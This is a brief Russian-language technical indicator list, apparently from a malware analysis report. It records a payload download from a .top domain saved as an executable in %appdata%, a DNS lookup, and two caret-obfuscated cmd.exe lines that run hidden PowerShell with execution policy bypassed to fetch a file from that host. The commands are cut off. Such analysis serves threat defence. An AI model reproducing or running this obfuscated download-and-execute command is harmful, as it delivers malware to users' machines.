Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^owERSh^el^L.eX^E^ ^-eX^EC^UTIoN^PoLi^CY ^bY^pa^sS ^-no^pro^FILE^ ^-^wind^oWST^YL^e ^hIDD^eN (n^ew^-OB^ject s^YSt^em^.nET.webClIEnt).doWn^L^O^aDf^iLe('http://smoeroota.top/re...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "p^owERSh^el^L.eX^E^ ^-eX^EC^UTIoN^PoLi^CY ^bY^pa^sS ^-no^pro^FILE^ ^-^wind^oWST^YL^e ^hIDD^eN (n^ew^-OB^ject s^YSt^em^.nET.webClIEnt).doWn^L^O^aDf^iLe('http://smoeroota.top/re...' (со скрытым окном)